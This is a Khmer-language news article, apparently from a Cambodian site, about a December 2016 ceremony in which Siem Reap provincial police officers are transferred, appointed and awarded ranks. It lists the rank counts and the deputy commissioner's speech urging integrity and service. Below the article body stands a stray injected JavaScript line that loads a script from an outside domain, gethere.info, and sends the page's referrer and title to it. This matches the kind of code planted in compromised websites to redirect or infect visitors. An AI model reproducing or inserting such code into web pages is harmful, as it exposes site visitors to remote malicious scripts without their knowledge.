Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ពិធីប្រកាសផ្ទេរភារកិច្ច តែងតាំងមុខតំណែង និងបំពាក់ឋានន្តរសក្កិ ដល់មន្ត្រីនគរបាលជាតិ ចំណុះឲ្យស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប

សៀមរាប៖ នៅព្រឹកថ្ងៃទី១៥-១៦ ខែធ្នូ ឆ្នាំ២០១៦នេះ ស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប បានរៀបចំពិធីប្រកាសផ្ទេរភារកិច្ច តែងតាំងមុខតំណែង និងបំពាក់ឋានន្តរសក្តិជូនដល់មន្ត្រីនគរបាលជាតិ នៃស្នងការដ្ឋាននគរបាលខេត្តសៀមរាបចំនួន១២១នាក់ ក្រោមអធិបតីភាពលោកឧត្តមសេនីយ៍ត្រី ឡាច សាវិន ស្នងការរងទទួលផែនគ្រប់គ្រង់ ធនធានមនុស្ស តំណាងដ៏ខ្ពង់ខ្ពស់ លោកឧត្តមសេនីយ៍ទោ សត ណាឌី ស្នងការនគរបាលខេត្តសៀមរាប ដោយមានការ អញ្ជើញចូលរួម ក្នុងអង្គពិធីនោះរួមមាន អស់លោក នាយ នាយរងការិយាល័យ លោកអធិការ អធិការរង នាយ នាយរងប៉ុស្តិ៍នគរបាលរដ្ឋបាល និងអង្គភាពពាក់ព័ន្ធ រួមទាំងមន្រ្តីនគរបាលជាច្រើនរូបទៀត ។

លោកវរសេនីយ៍ត្រី ម៉ែន មុន្នី នាយការិយាល័យនគរបាលបុគ្គលិកស្តីទី នៃស្នងការដ្ឋាននគរបាលខេត្ត សៀមរាប បានឡើងអានសេចក្តីសម្រេចផ្ទេរភារៈកិច្ច តែងតាំងមុខតំណែង និង បំពាក់ឋានន្តរសក្តិរបស់អគ្គស្នងការដ្ឋាននគរបាលជាតិ ក្រសួងមហាផ្ទៃជូនអង្គពិធីរួចមក លោកឧត្តមសេនីយ៍ត្រី ឡាច សាវិន ស្នងការរងនគរបាលខេត្តសៀមរាប បានអញ្ជើញបំពាក់ ឋានន្តរសក្តិជូនដល់មន្ត្រីនគរបាលជាតិចំនួន៣៦៨នាក់ ចំណុះឲ្យស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប។
ក្នុងនោះមាន៖
១.ថ្នាក់អនុសេនីយ៍ឯក ៣៥នាក់។
២.ថ្នាក់អនុសេនីយ៍ទោ ៩៦នាក់។
៣.ថ្នាក់អនុសេនីយ៍ត្រី ៤៦នាក់។
៤.ថ្នាក់ព្រិន្ទបាលឯក ៦២នាក់។
៥.ថ្នាក់ព្រិន្ទបាលទោ ៣៣នាក់។

ក្នុងពិធីបំពាក់ឋានន្តរសក្កិនាពេលនោះលោកឧត្តមសេនីយ៍ត្រី ឡាច សាវិន ស្នងការរង ទទួលផែនគ្រប់គ្រងធនធានមនុស្ស បានមានមតិសំណេះសំណាល និង ថ្លែងកោតសរសើរ ដល់កងកម្លាំងនគរបាលខេត្តសៀមរាបទាំងអស់ ដែលកន្លងមកបានខិតខំប្រឹងប្រែងអនុវត្តន៍ការងារបានយ៉ាងសកម្ម និងល្អប្រសើរ ជាពិសេស ការរក្សាសន្តិសុខ សុវត្ថិភាព សណ្ដាប់ធ្នាប់ ជូនប្រជាពលរដ្ឋ រួមទាំងភ្ញៀវជាតិ អន្តរជាតិ ដែលបានចេញចូល ស្នាក់នៅបានល្អ នៅក្នុងខេត្តសៀមរាប។ លោកបានធ្វើការផ្ដាំផ្ញើរ ដល់មន្ត្រីនគរបាលទាំងអស់ ត្រូវបន្តយកចិត្តទុកដាក់ បន្ថែមទៀតលើការងារជំនាញរបស់ខ្លួន ត្រូវយកតួនាទី ភារកិច្ចរបស់ខ្លួន ទៅបំរើផលប្រយោជន៍ប្រជាពលរដ្ឋ និងមានសាមគ្គីភាពល្អក្នុងអង្គភាព ជាពិសេសត្រូវសហការឲ្យបានល្អ ជាមួយអង្គភាពពាក់ព័ន្ធ។ លោកឧត្តមសេនីយ៍ត្រី ឡាច សាវិន បានមានប្រសាសន៍បន្ថែមថា ថ្នាក់ដឹកនាំនៅតាមបណ្ដាអធិការដ្ឋាន និង លោកនាយប៉ុស្តិ៍នគរបាលរដ្ឋបាល ត្រូវប្រគល់តួនាទីភារកិច្ច ការងារជូនមន្ត្រីក្រោមឱវាទ ឲ្យប្រឹងប្រែងអនុវត្តន៍ការងារ និងអនុវត្តន៍ច្បាប់ឲ្យមានប្រសិទ្ធភាព និងតម្លាភាព ហើយត្រូវស្មោះត្រង់ចំពោះជាតិ ចំពោះព្រះមហាក្សត្រ និងប្រជាពលរដ្ឋ អនុវត្តន៍នូវវិន័យសេចក្តីថ្លៃថ្នូរ ក្នុងនាម ជាមន្ត្រីនគរបាលជាតិ មិនត្រូវយកអំណាចទៅប្រើប្រាស់ នូវអំពើខុសច្បាប់ គៀបសង្កាត់ប្រជាពលរដ្ឋ ដើម្បីផលប្រយោជន៍របស់ខ្លួននោះឡើយ។ត្រូវបន្តធ្វើការផ្សព្វផ្សាយ បើកវេទិការសាធារណៈ ជាមួយប្រជាពលរដ្ឋ សិស្សានុសិស្ស ឲ្យបានញឹកញ៉ាប់ និងផ្សព្វផ្សាយគោលនយោបាយភូមិឃុំមានសុវត្ថិភាព ទាំង០៩ចំណុច ឲ្យបានទូលំទូលាយ។ បំរើសេវាសាធារណៈជូនប្រជាពលរដ្ឋឲ្យទាន់ពេលវេលា និងបន្តត្រួតពិនិត្យអាវុធជាតិផ្ទុះជាប្រចាំ ដើម្បីរក្សាសន្តិសុខ សុវត្ថិភាព សណ្ដាប់ធ្នាប់ជូនប្រជាពលរដ្ឋទូទាំងខេត្តឲ្យបានកាន់តែល្អប្រសើរទ្វេរឡើងថែមទៀត។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More